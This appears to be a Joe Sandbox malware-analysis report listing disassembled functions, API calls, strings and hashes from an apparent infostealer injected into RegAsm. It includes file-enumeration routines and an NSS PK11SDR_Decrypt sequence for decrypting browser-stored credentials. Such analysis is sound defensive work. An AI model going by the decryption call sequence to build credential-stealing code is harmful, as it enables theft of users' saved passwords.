                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                    • API String ID: 487479824-2878602165
                                                                                    • Opcode ID: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                                    • Instruction ID: 0c5addb11b1d7d17326ea920779962a00a71723b413463e1f4d38d0b57080ddc
                                                                                    • Opcode Fuzzy Hash: f3652298cfaf84afb1478c85229df9775f1e14ea5c2caa6f2727f11e30230c02
                                                                                    • Instruction Fuzzy Hash: 28F1D470A05A199FDB20CF65CC8879AB7B4AF46318F14C299E809A7645F771AE84CF90
                                                                                    Function 00415E66 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415E6B
                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                    • wsprintfA.USER32 ref: 00415EA2
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                    • StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                    • StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                    • wsprintfA.USER32 ref: 00415F14
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00412DD7: _EH_prolog.MSVCRT ref: 00412DDC
                                                                                      • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412DFD
                                                                                      • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412E0B
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E55
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                      • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                      • Part of subcall function 00412DD7: StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416043
                                                                                    • FindClose.KERNEL32(00000000), ref: 00416052
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416077
                                                                                    • lstrcat.KERNEL32(?), ref: 0041608A
                                                                                    • lstrlenA.KERNEL32(?), ref: 00416093
                                                                                    • lstrlenA.KERNEL32(?), ref: 004160A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                    • String ID: %s\%s$%s\*
                                                                                    • API String ID: 398052587-2848263008
                                                                                    • Opcode ID: 63ac0b4f7887d16743dcc7ab6b80fdab1ad53bf4e2214e09a21ad602e9ec066e
                                                                                    • Instruction ID: a99d7ec9afc9e54ff042e61fe5953241a92e37fb8bf677b5a63d53ea1a41efa9
                                                                                    • Opcode Fuzzy Hash: 63ac0b4f7887d16743dcc7ab6b80fdab1ad53bf4e2214e09a21ad602e9ec066e
                                                                                    • Instruction Fuzzy Hash: A1815A71D00259AFDF10EBE4DD49BEEBBB8AF19308F0040BAF519A3191DB785648CB65
                                                                                    Function 0040A981 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A986
                                                                                    • wsprintfA.USER32 ref: 0040A9AF
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E8C), ref: 0040A9E3
                                                                                    • StrCmpCA.SHLWAPI(?,00425E90), ref: 0040A9FD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00425BD2,00000000,?,?,?,00425E94,?,?,00425BCF), ref: 0040AAAD
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF44
                                                                                    • FindClose.KERNEL32(00000000), ref: 0040AF53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                    • String ID: #$%s\*.*
                                                                                    • API String ID: 1095930517-2760317471
                                                                                    • Opcode ID: ac54f6a7e1c693c7dda104cf982ec4a808cc1d3f01b8cc140d18f4a5d252d643
                                                                                    • Instruction ID: 81f31c6ecc9a7ee4f6aedb7c6da72081edb396998294622306a5519667665df6
                                                                                    • Opcode Fuzzy Hash: ac54f6a7e1c693c7dda104cf982ec4a808cc1d3f01b8cc140d18f4a5d252d643
                                                                                    • Instruction Fuzzy Hash: FF027E71904248EACB15EBE4C856BDEBB78AF19304F4040BEE509B35C2DB385B4DCB66
                                                                                    Function 6CC77E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpystrlen
                                                                                    • String ID: (pre-xul)$data$name$schema
                                                                                    • API String ID: 3412268980-999448898
                                                                                    • Opcode ID: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                                    • Instruction ID: 4d56c689506c449e9a612656d41bc76c7497c97c30b12ef846419548ae7a4176
                                                                                    • Opcode Fuzzy Hash: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                                    • Instruction Fuzzy Hash: 67E18FB1A043418FC714CF68884065BFBE9FBC5354F14892DE899E7791EB70ED098B92
                                                                                    Function 6CC5D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                                      • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                      • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D6A6
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D712
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D7EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                    • API String ID: 2690322072-3894294050
                                                                                    • Opcode ID: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                                    • Instruction ID: 3a1904b411e8ecb7703ff20645f2cf63c177bf90dee054111eecc66439d545a9
                                                                                    • Opcode Fuzzy Hash: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                                    • Instruction Fuzzy Hash: 68910271A047418FD714CF69C29022AB7F1FB89744F54892EE45AD7B84FB30E861CB8A
                                                                                    Function 6CC94EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000007D0), ref: 6CC94EFF
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC94F2E
                                                                                    • moz_xmalloc.MOZGLUE ref: 6CC94F52
                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6CC94F62
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952B2
                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952E6
                                                                                    • Sleep.KERNEL32(00000010), ref: 6CC95481
                                                                                    • free.MOZGLUE(?), ref: 6CC95498
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                    • String ID: (
                                                                                    • API String ID: 4104871533-3887548279
                                                                                    • Opcode ID: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                                    • Instruction ID: bef3cfb0d40f4835ba05d26199991e5acd628ad4c6065d02491ebc1adfa071c2
                                                                                    • Opcode Fuzzy Hash: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                                    • Instruction Fuzzy Hash: 0FF1F375A18B008FC716CF78C85062BB7F9AFD6384F05872EF846A7651EB31D8468B81
                                                                                    Function 6CC47810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC47885
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC478A5
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC478AD
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC478CD
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC478D4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC478E9
                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6CC4795D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6CC479BB
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6CC47BBC
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC47C82
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC47CD2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6CC47DAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                    • String ID:
                                                                                    • API String ID: 759993129-0
                                                                                    • Opcode ID: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                                    • Instruction ID: de31c2ff16b41d6fbe935adb9dc5b39ea4c470711c546b6f19300ba7a1f42f6c
                                                                                    • Opcode Fuzzy Hash: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                                    • Instruction Fuzzy Hash: D8023E71E0121A8FDB54CF59C984799B7B5FF88318F25C2AAD809A7751E730AE91CF80
                                                                                    Function 004082DE Relevance: 15.1, APIs: 10, Instructions: 83stringencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00408305
                                                                                    • lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                    • CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                    • PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                    • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                    • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                    • memcpy.MSVCRT ref: 00408391
                                                                                    • lstrcat.KERNEL32(00425B87,00425B8B), ref: 004083B8
                                                                                    • PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                    • lstrcat.KERNEL32(00425B87,00425B8E), ref: 004083D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 2251291257-0
                                                                                    • Opcode ID: c50b8bd6e5bf44195200b814502ab1ff21272c9ffb322e859665ff8925258165
                                                                                    • Instruction ID: 7b5aa21d4fd6a2ae8f0576019faf014b4e2967858d758fb1c118222b80198efe
                                                                                    • Opcode Fuzzy Hash: c50b8bd6e5bf44195200b814502ab1ff21272c9ffb322e859665ff8925258165
                                                                                    • Instruction Fuzzy Hash: 1E2189B590021DEFCB009FA4DD85AEE7BBCFB08744F10047AFA05F2250EB359A459BA5
                                                                                    Function 00409900 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409905
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BA6,00000000,75AFAC90), ref: 00409964
                                                                                    • StrCmpCA.SHLWAPI(?,00425DDC), ref: 00409981
                                                                                    • StrCmpCA.SHLWAPI(?,00425DE0), ref: 0040999B
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00409F07
                                                                                    • FindClose.KERNEL32(00000000), ref: 00409F16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                    • String ID: "$\*.*
                                                                                    • API String ID: 1275501236-2874818444
                                                                                    • Opcode ID: ba1e41c3a08dd9c9c4b97970b2329b66f396e22d7e45ebdf869dc2bc4f58e3ba
                                                                                    • Instruction ID: 8c998fa2f9c1fd353ee5f1f27dacdcbdf329c9249c59a3b65554af7f07740ccf
                                                                                    • Opcode Fuzzy Hash: ba1e41c3a08dd9c9c4b97970b2329b66f396e22d7e45ebdf869dc2bc4f58e3ba
